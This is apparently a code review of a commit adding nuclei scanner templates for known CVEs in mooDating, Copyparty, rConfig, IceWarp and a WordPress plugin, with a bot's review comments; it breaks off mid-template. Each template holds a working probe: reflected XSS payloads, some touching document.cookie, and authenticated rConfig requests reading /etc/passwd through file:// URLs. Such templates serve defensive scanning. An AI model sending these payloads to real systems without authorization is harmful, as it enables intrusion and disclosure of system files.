classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3843
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,exploitdb,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
|
||||||
|
condition: and
|
|
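Review bot: The `description` pastes the advisory text verbatim, including the database bookkeeping sentence "VDB-235194 is the identifier assigned to this vulnerability" and the disclosure note "NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly", neither of which describes the weakness. Trimming it to the vulnerability statement reads better in scan output, e.g. `mooSocial mooDating 1.2 is vulnerable to reflected cross-site scripting via the URL handler of /matchmakings/question; a remote attacker can inject script that executes in a victim's browser.` The same verbatim pattern appears in the other mooDating descriptions in this commit.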
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3844
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3844
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3844
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>r5c3m", "mooDating")'
|
||||||
|
condition: and
|
|
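Review bot: The `tags` line omits `unauth` even though this is an unauthenticated GET, while the neighbouring mooDating templates for CVE-2023-3843 and CVE-2023-3849 include it; the inconsistency means `-tags unauth` will select some of the set and not others. `tags: cve,cve2023,xss,unauth,moodating` aligns it, and the same applies to the CVE-2023-3845, -3846, -3847 and -3848 sections.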
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3845
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3845
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3845
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
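Review bot: The matcher `contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")` drops the per-request marker `f26v4` that the request path carries, whereas the CVE-2023-3843 and CVE-2023-3844 templates keep their markers (`w71ch`, `r5c3m`) in the body check. Keeping the marker ties the match to this exact reflection rather than to any page that happens to contain a generic `<img` tag, so `- 'contains_all(body, "><img src=a onerror=alert(document.domain)>f26v4", "mooDating")'` is the more specific check. The CVE-2023-3846, -3847 and -3848 sections drop their markers in the same way.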
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3846
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3846
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3846
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
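Review bot: The request path embeds a fixed `redirect_url` base64 blob that appears to decode to a URL on the vendor's public demo host, so every scan hands the target a redirect pointing at a third-party site and couples the template to that demo instance; a neutral value derived from the target, e.g. `redirect_url={{base64(BaseURL)}}`, or simply an empty `redirect_url=`, exercises the same code path without referencing an external host. The query string `?access_token&=redirect_url=` also looks malformed (`&=`), presumably `?access_token=&redirect_url=`; worth confirming against the original report.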
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3847
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-Site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3847
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3847
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>","mooDating")'
|
||||||
|
condition: and
|
|
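Review bot: The matcher `contains_all(body, "><img src=a onerror=alert(document.domain)>","mooDating")` is missing the space after the comma that every other `contains_all` call in this commit uses; `- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'` keeps the style uniform. The description here also repeats the verbatim advisory text noted on the CVE-2023-3843 section.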
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2023-3848
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3848
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3848
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/users/viewi1omd"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooDating")'
|
||||||
|
condition: and
|
|
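Review bot: The request path is the same endpoint and payload as the CVE-2023-3847 template in this commit (`/users/viewi1omd…l43yn/108?tab=activity`), differing only in that `"` and `>` are left unencoded here, so the two templates will both fire on the same response and cannot be told apart in results; since this CVE is described as affecting `/users/view`, it needs its own marker and path, or the two should be consolidated into one template with both IDs referenced. Leaving `"` raw in the path also makes the bytes on the wire depend on how nuclei normalises the URL, which I cannot confirm from the template; percent-encoding as in the 3847 path (`%22%3e…%3e`) makes it deterministic.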
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2023-3849
|
||||||
|
info:
|
||||||
|
name: mooDating 1.2 - Cross-site scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3849
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-3849
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xss,unauth,moodating
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 404'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "><img src=a onerror=alert(document.cookie)>s9a64") && contains(body, "mooDating")'
|
||||||
|
condition: and
|
|
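Review bot: The probe and matcher use `alert(document.cookie)` while every other XSS template in this commit uses `alert(document.domain)`; `document.domain` is the repository's standard benign reflection marker and keeps session material out of scan traffic, target logs and matcher strings. Aligning both lines gives `- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.domain)>s9a64?'` and `- 'contains(body, "><img src=a onerror=alert(document.domain)>s9a64") && contains(body, "mooDating")'`. The trailing `?` on the path appears to be leftover and can be dropped.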
@ -1,53 +1,35 @@
|
||||||
id: CVE-2023-38501
|
id: CVE-2023-38501
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Copyparty v1.8.6 - Cross-Site Scripting
|
name: CopyParty v1.8.6 - Cross Site Scripting
|
||||||
author: ctflearner
|
author: r3Y3r53
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
|
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
|
||||||
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
remediation: Fixed in v1.8.6
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/51635
|
- https://www.exploit-db.com/exploits/51635
|
||||||
- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
|
- https://github.com/9001/copyparty/releases/tag/v1.8.6
|
||||||
- https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
|
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
|
||||||
- http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2023-38501
|
cwe-id: CWE-79
|
||||||
cwe-id: CWE-79
|
|
||||||
epss-score: 0.00282
|
|
||||||
epss-percentile: 0.64883
|
|
||||||
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: copyparty_project
|
|
||||||
product: copyparty
|
|
||||||
shodan-query: title:"copyparty"
|
shodan-query: title:"copyparty"
|
||||||
tags: packetstorm,copyparty,cve,cve2023,xss
|
tags: cve,cve2023,copyparty,xss,oss
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
|
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: body
|
dsl:
|
||||||
words:
|
- 'status_code == 200'
|
||||||
- '<img src=copyparty onerror=alert(document.domain)>'
|
- 'contains(content_type, "text/html")'
|
||||||
- 'go to /'
|
- 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- 'text/html'
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
|
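Review bot: Reading the longer column as the old side per the `-1,53 +1,35` counts, the rewritten template drops `cve-id: CVE-2023-38501` from `classification`, the `cpe`, `vendor` and `product` fields, and the GHSA advisory and fixing-commit references, which looks like a metadata regression rather than a deliberate change; restoring at least `cve-id: CVE-2023-38501`, `- https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh` and `- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38` keeps the template traceable to the upstream fix. The new `remediation: Fixed in v1.8.6` is consistent with the description's "Versions prior to 1.8.6". The switch from three word/status matchers to a single dsl matcher is behaviourally equivalent and fine.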
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2023-39108
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39108
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39108
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- "rConfig"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
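Review bot: `max-request: 1` understates the template, which sends three raw requests (`GET /login.php`, the `POST /lib/crud/userprocess.php` login and the `GET /lib/crud/configcompare.crud.php` probe); it should be `max-request: 3`. The CVE-2023-39109 section has the same `max-request: 1` for three requests and the CVE-2023-39110 section omits the field entirely. The `rConfig` word match on `body_1` is a useful product gate before the login step and is worth keeping.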
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2023-39109
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39109
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39109
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- "rConfig"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
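Review bot: The tags end in `lfi` while the two sibling rConfig templates in this commit (CVE-2023-39108 and CVE-2023-39110) use `lfr` for the same `file://` read behaviour; whichever term the repository standardises on, the three should agree so they can be selected together, e.g. `tags: cve,cve2023,rconfig,authenticated,ssrf,lfr`. The `type: status` matcher here carries no `part`, unlike the other two, which is the form I would keep across all three.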
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2023-39110
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Server-Side Request Forgery
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39110
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-39110
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- 'rConfig'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
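Review bot: The `type: status` matcher carries `part: header_3`; I am not certain the status matcher honours a `part` key at all, so the intended "status of the third response" may be silently evaluated against the default response instead. A dsl check states it unambiguously: `- type: dsl` with `dsl:` `- 'status_code_3 == 200'`. The CVE-2023-39108 section uses the same `part: header_3` on its status matcher; the CVE-2023-39109 section omits it and so has nothing to fix here.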
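--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-39700)
@@ -0,0 +1,35 @@
+id: CVE-2023-39700
+
+info:
+  name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-39700
+    - https://cwe.mitre.org/data/definitions/79.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-39700
+    cwe-id: CWE-79
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: http.title:"IceWarp Server Administration"
+  tags: cve,cve2023,icewarp,xss,unauth
+
+http:
+  - raw:
+      - |
+        GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header, "text/html")'
+          - 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
+        condition: and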
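Review bot: `max-request: 2` under `metadata` does not match the template, which sends a single raw request; it should read `max-request: 1`. The content-type check `contains(header, "text/html")` also differs from every sibling template, which uses `contains(content_type, "text/html")`; scanning the whole header block is looser, since any header value carrying that string would satisfy it. Note too that `shodan-query: http.title:"IceWarp Server Administration"` fingerprints the administration UI while the request targets `/webmail/`, so the query may not surface hosts that expose only webmail.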
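--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-40208)
@@ -0,0 +1,49 @@
+id: CVE-2023-40208
+
+info:
+  name: Stock Ticker <= 3.23.2 - Cross-Site Scripting
+  author: theamanrawat
+  severity: medium
+  description: |
+    The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  remediation: Fixed in version 3.23.3
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting
+    - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability
+    - https://wordpress.org/plugins/stock-ticker/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-40208
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-40208
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "stock_ticker"
+          - "onmousemove=alert(document.domain)"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200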
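Review bot: The description says the flaw affects 'versions up to, and including, 3.23.3', which contradicts both the name (`Stock Ticker <= 3.23.2`) and `remediation: Fixed in version 3.23.3`; presumably the description should read 'up to, and including, 3.23.2'. The `metadata` block also lacks `max-request: 1`, which the other templates in this commit carry.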
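--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-40779)
@@ -0,0 +1,38 @@
+id: CVE-2023-40779
+
+info:
+  name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect
+  author: r3Y3r53
+  severity: medium
+  description: |
+    An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.
+  reference:
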